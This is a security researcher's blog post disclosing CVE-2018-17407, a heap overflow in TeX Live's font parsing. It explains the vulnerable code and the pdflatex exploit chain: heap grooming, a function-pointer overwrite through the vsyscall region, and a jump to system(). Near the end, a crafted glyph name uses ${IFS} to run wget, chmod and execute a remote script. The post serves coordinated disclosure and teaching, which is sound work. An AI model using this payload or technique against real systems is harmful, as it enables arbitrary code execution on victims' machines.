Exploiting LaTeX with CVE-2018-17407

This post is about a vulnerability I found in TeX Live, the popular distribution of LaTeX. It is now tracked by CVE-2018-17407. The following summary paragraph contains a good overview of relevant information. I couldn’t resist writing an exploit to go along with it, and so the rest of this post demonstrates how the bug can be leveraged for arbitrary code execution when pdflatex is run on a poisoned input.

CVE-2018-17407 is a heap buffer overflow caused by the unsafe processing of Type 1 font files (.pfb files). I reported it to the developers on Sept 12, 2018, and a patch was rolled out with a public security advisory on Sept 21, 2018. It affects the following tools in the TeX Live suite: pdflatex, pdftex, dvips, and luatex. To trigger the buffer overflow, a malicious font must be processed by one of the vulnerable tools. Fonts are found automatically, so an attack could be mounted by planting a malicious font in a shared repository. As a result, updating your LaTeX installation is likely a good idea if you build documents from shared sources. See this page for more information about affected versions and tracking. The vulnerable code was also forked by the MiKTeX project and has been fixed in MiKTeX 2.9.6840.

The series of events leading up to the discovery of the bug was quite interesting! I was using the AFL fuzzer on dvips, a tool for converting DVI files into PS files. DVI files are quite compact binary files which are typically converted to PDF or PostScript for visualization. The DVI filetype doesn’t support embedding fonts, and so DVI files instead refer to font names they expect to find on the system during visualization. What happened is that AFL randomly mutated the name of a font in the DVI file and discovered another valid font on my own system all by itself! The font that it discovered had particularly short line lengths, which led to some false positive alerts from Address Sanitizer when parsing it. While investigating those false positives, I eventually stumbled upon the following vulnerable function by manual inspection:

static void t1_check_unusual_charstring(void)
	char *p = strstr(t1_line_array, charstringname) + strlen(charstringname);
	int i;
	/* if no number follows "/CharStrings", let's read the next line */
	if (sscanf(p, "%i", &i) != 1) {
		strcpy(t1_buf_array, t1_line_array);
		*(strend(t1_buf_array) - 1) = ' ';
		strcat(t1_buf_array, t1_line_array);
		strcpy(t1_line_array, t1_buf_array);
		t1_line_ptr = eol(t1_line_array);

This function handles a special case in which a logical line of the font file may be split into two input lines. It reads them both and concatenates them together into t1_buf_array with a call to strcat() — but without a bounds check! Oops. Two lines are stored into the space for one. The buffers here (t1_line_array and t1_buf_array) are managed automatically with a set of macros. By crafting long lines in a .pfb file we can grow these buffers to arbitrary sizes, and then use a “/CharStrings” line to trigger the overflow. This provides us with a very powerful heap memory corruption primitive for two reasons: (1) we get to choose the size of the buffer, which gives us a high degree of influence on where the allocator positions it, and (2) we can overflow the buffer by its full (and arbitrarily chosen) size, giving us a far reach into whatever objects live in nearby memory. However, this bug isn’t triggered until closefilesandterminate() is called, which as the name suggests doesn’t leave us much time to make use of our memory corruption capability before the program exits. And secondly, strcat() doesn’t copy null bytes, which makes exploitation significantly trickier than it would be with an equivalent memcpy() overflow.

This same vulnerable function is used by other tools in TeX Live: pdflatex, pdftex, dvips and luatex. I only built an exploit for pdflatex, the most widely used of the vulnerable tools.

To begin evaluating how the bug might be exploited, I wrote and embedded a scanner into pdflatex that probed all of the code pointers stored in the heap to check if any of them are used in the small window of time between the overflow and pdflatex exiting. There were a couple of hits! I traced them down to the following data structure:

/* Tree data structure. */
struct avl_table
    struct avl_node *avl_root;          /* Tree's root. */
    avl_comparison_func *avl_compare;   /* Comparison function. */
    void *avl_param;                    /* Extra argument to |avl_compare|. */
    struct libavl_allocator *avl_alloc; /* Memory allocator. */
    size_t avl_count;                   /* Number of items in tree. */
    unsigned long avl_generation;       /* Generation number. */
TeX Live makes heavy use of AVL trees for managing generic objects, including strings, images and font glyphs. The avl_compare function pointer is used for polymorphism-like behavior in C, allowing a range of comparison functions to be implemented for different kinds of objects. By controlling avl_compare, we have the opportunity to hijack the control-flow of pdflatex when the program later uses its AVL tree. And good news for us, these code pointers are used in the termination routines and thus serve as viable targets!

Having chosen a target structure, the next step is to arrange the heap such that the victim struct avl_table is located in memory directly after the t1_buf_array from which we can overflow. I wrote a simple brute force heap sprayer that generates LaTeX documents, and ran it to find exploitable heap layouts. After several thousand heap arrangement attempts, the sprayer found an optimal layout with a distance of only 16 bytes (the minimum possible including the allocator metadata) between the end of the buffer and the first field of the victim struct. Note that this stage would need to be rerun again for a new TeX file input although the same font payload could be reused; it’s also likely that more robust heap spraying could be done, but I didn’t spend any time doing so.

After positioning the victim struct to follow the buffer we can overflow, we can proceed to overwrite the fields of the avl_table. Because the text section of the program is mapped to low virtual addresses, code pointers have multiple null bytes in their most significant bytes (and we can’t copy null bytes with strcat()). However, we can clobber avl_root and continue writing to just the least significant bytes of avl_compare (thanks to the little endian byte ordering on x86), which is already a valid code pointer and has appropriate null bytes in the high bits of the address. This allows us to redirect avl_compare to any code location of our choosing, but to do so we must overwrite avl_root. This is indeed problematic: all code locations that make use of avl_compare first issue an access from the avl_root pointer, causing a segmentation fault before we hijack control-flow. I found I could solve this issue with a clever trick. Let’s look at the memory layout of the pdflatex process with pmap:

Address           Kbytes     RSS   Dirty Mode  Mapping
0000000000400000    2460     832       0 r-x-- pdftex
0000000000400000       0       0       0 r-x-- pdftex
0000000000867000       8       8       4 r---- pdftex
00007fbde01db000    1792    1296       0 r-x-- libc-2.23.so
00007fbde01db000       0       0       0 r-x-- libc-2.23.so
00007fbde039b000    2048       0       0 ----- libc-2.23.so
00007fbde05a5000       0       0       0 r-x-- libm-2.23.so
00007fbde06ad000    2044       0       0 ----- libm-2.23.so
00007fff359bd000     132      20      20 rw---   [ stack ]
ffffffffff600000       4       0       0 r-x--   [ anon ]
ffffffffff600000       0       0       0 r-x--   [ anon ]
The bottom entry is the vsyscall region. It’s conveniently mapped to the high end of the virtual address space with no ASLR. And importantly, it contains addresses with no null bytes, such as 0xffffffffff600ffc. We can then use strcat() to write this static address over avl_root, and because it’s in a readable region the avl_root load completes without crashing the program. pdflatex then proceeds to load and use our corrupted function pointer.

The last piece of the puzzle is making use of our control-flow hijack. pdflatex has a few calls to system() lying around for supporting functionality such as running shell commands. For security reasons these are disabled unless the --shell-escape flag is set, but with our control-flow hijack we can evade these checks and jump to any instruction we’d like. The various call sites (and the various entry points to those call sites) give us a range of register (and stack-stored) values that we can prepare as arguments to system(). Additionally, the heap sprayer found several locations that use the corrupted AVL tree and the hijack could be launched from any of them. One of these combinations yields a char * pointer that points to the name of one of the glyphs being operated on! We can use it to redirect the name of the glyph from the font file to serve as an argument to system(). Its contents are loaded into memory from reading entries like these from the .pfb file:

dup 45 /hyphen put
dup 46 /period put
dup 47 /slash put
dup 48 /zero put
dup 49 /one put
dup 50 /two put
dup 51 /three put
dup 52 /four put
The parsing code stops reading the glyph name when it encounters a space, but because sh interprets the string we can make use of shell semantics to encode arbitrary commands. In particular, the Internal Field Separator environment variable contains a space, a tab and a newline. Alternatively, brace expansion is another way to evade the space limitation. Using the IFS method we can then replace the glyph name with:

dup 47 /wget${IFS}nickroessler.com/s${IFS}&&${IFS}chmod${IFS}+x${IFS}s${IFS}&&./s put
And voila! LaTeX downloads a shell script from the Internet and executes it with the permissions of the pdflatex process:

I’d like to thank Norbert Preining and Karl Berry of the TeX Live team for their professional and quick responses and for being pleasant to work with on the patch.

Thanks for reading! Follow me on Twitter here.